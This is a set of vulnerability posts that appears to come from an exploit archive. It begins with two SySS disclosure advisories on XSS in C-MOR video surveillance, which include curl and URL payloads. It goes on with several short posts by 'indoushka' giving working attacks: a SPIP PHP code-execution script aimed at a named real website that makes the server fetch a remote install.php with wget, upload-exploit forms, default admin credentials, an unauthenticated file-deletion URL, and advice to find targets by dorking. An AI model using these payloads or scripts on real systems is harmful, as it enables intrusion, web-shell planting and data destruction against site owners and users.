<pre><code>Advisory ID: SYSS-2024-021<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45177<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper input validation, the C-MOR web interface is vulnerable<br />to persistent cross-site scripting attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that the camera<br />configuration is vulnerable to a persistent cross-site scripting attack<br />due to insufficient user input validation.<br /><br />This kind of attack enables an attacker to persistently store attack<br />vectors in form of arbitrary code, for instance JavaScript code, in the<br />web application database, which may be executed in the context of other<br />users.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />An authenticated user can set the location of a camera. If valid<br />JavaScript code is used as location value, this code will be<br />persistently stored in the web application database.<br /><br />The injected JavaScript code is served to users and executed in their<br />web browser's context when using different functionality of the C-MOR<br />web interface, for instance camera settings via "show-movies.plm" or<br />system administration via "systemadministration.plm".<br /><br />The following HTTPS POST request illustrates storing an attack vector<br />via the parameter "location":<br /><br />POST /changelocation.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 81<br /><br />location=location%3Cscript%3Ealert%28%22SySS+XSS%21%22%29%3C%2Fscript%3E&cam=cam1<br /><br /><br />An excerpt of the resulting HTML source code containing the injected<br />JavaScript code is shown below:<br /><br />(...)<br /><input type=submit value="Aufzeichnung aktivieren" class="link_button2"> <br />location<script>alert("SySS XSS!")</script><br><br />(...)<br /><br />This PoC attack can be performed using the following curl command:<br /><br />curl -X POST -d 'location=location<script>alert("SySS <br />XSS!")</script>&cam=cam1' --user "<USERNAME>:<PASSWORD>" --insecure <br />--ciphers 'DEFAULT:!DH' https://<HOST>/changelocation.pml<br /><br /><br />In version 6.00PL01, persistent cross-site scripting vulnerabilties have<br />not been fixed completely. For example, the following attack vector can<br />successfully store attacker-controlled JavaScript code in the logs:<br /><br />curl -X POST \<br /> -d 'cam=</textarea><script>alert("Hello from <br />XSS")</script><textarea>&days=1100' \<br /> --user "<USERNAME>:<PASSWORD>" \<br /> --insecure \<br /> --ciphers 'DEFAULT:!DH' \<br /> https://<HOST>/show-movies.pml<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The described security vulnerability has not been fixed entirely in the<br />newly released software version 6.00PL01.<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-021<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-021.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-020<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Reflected Cross-Site Scripting (CWE-79)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45176<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper input validation, the C-MOR web interface is vulnerable<br />to reflected cross-site scripting attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functions are prone to reflected cross-site scripting attacks due to<br />insufficient user input validation.<br /><br />This kind of attack allows an attacker to send a manipulated link to<br />an authenticated victim in order to execute arbitrary JavaScript code<br />in the context of the victim's web browser.<br /><br />Reflected cross-site scripting vulnerabilities were found in the<br />following C-MOR scripts and exploited via different URL parameters,<br />for instance the parameter "ujava":<br /><br />* index-de.plm<br />* list-timelapse.plm<br />* list-motion.plm<br />* setdelays.plm<br />* show-movies.plm<br />* show-movies-f.plm<br />* uploadcambackup.plm<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following three sample attack vectors exemplarily demonstrate<br />the found security issue.<br /><br />1) index-de.plm<br /><br />The following URL is an example of an attack vector exploiting a<br />reflected cross-site scripting vulnerability via the URL parameter<br />"ujava" of the web interface index page "index-de.plm":<br /><br />https://<HOST>/index-de.pml?ujava="><script>alert("SySS XSS!")</script><z="<br /><br /><br />2) list-timelapse.plm<br /><br />The following URL is an example of an attack vector exploiting a<br />reflected cross-site scripting vulnerability in the page<br />"list-timelapse.plm" via the URL parameter "days":<br /><br />https://<HOST>/list-timelapse.pml?days=1100&cam=cam1"><script>alert("SySS <br />XSS!")</script><z="<br /><br /><br />3) show-movies.plm<br /><br />The following URL is an example of an attack vector exploiting a<br />reflected cross-site scripting vulnerability in the page<br />"show-movies.plm" via the URL parameter "days":<br /><br />https://<HOST>/show-movies.pml?cam=cam1&days="><script>alert("SySS <br />XSS!")</script><z="<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-020<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-020.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Travel v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://github.com/oretnom23/php-travel-agency-system |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br /><form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data"> <br /> <label for="file">Upload File:</label><br /> <input type="file" id="file" name="file"><br><br><br /> <input type="submit" name="Fcuk Up" value="Fcuk Up"><br /></form><br /><br /><br />[+] Go to the line 1.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /tour/admin/operations/admin.php. <br /><br />[+] save code as poc.html .<br /><br />[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@admin.com & pass = password<br /><br />[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/products.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.12 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/fr_rubrique91.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 31 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br /><?php<br /><br />class indoushka {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br />}<br /> public function exploit() {<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br />}<br /><br />$targetUrl = 'https://www.speleo-mandeure.fr/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها<br />$exploit = new indoushka($targetUrl, $payload);<br />$exploit->exploit();<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Sports Complex Booking System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : File Management System 1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Payload enables deletion of uploaded files from admin control panel without login.<br /><br />[+] use payload : /Private_Dashboard/delete.php?ID=5<br /><br />[+] 127.0.0.1/demo/Private_Dashboard/delete.php?ID=5<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Crime Complaints Reporting Management System 1.0 arbitrary file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line : 109 Set your Target<br /><br />[+] Save As poc.html<br /><br />[+] payload :<br /><br /><br /><<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;"><br /> <div class="modal-header" style="background:#222d32"><br /> <button type="button" class="close" data-dismiss="modal">×</button><br /> <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center><br /> SYSTEM INFORMATION INITIALISATION<br /> </center></h4><br /> </div><br /> <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data"> <br /><br /> <div class="modal-body"> <br /> <center> <br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p><br /> Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed"><br /> <input type="hidden" name="page" value="admin.php"> <br /> </center><br /> </div><br /> <div class="modal-footer"><br /> <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;<br /> <button type="button" class="btn btn-success" data-dismiss="modal">Close</button><br /> </div><br /> </form></div><br /> <br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Blood Bank & Donor Management System v2.4 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/blood-bank-donor-management-system-free-download/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = Test@123<br /><br />[+] https://www/127.0.0.1/165.232.176.12/index.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>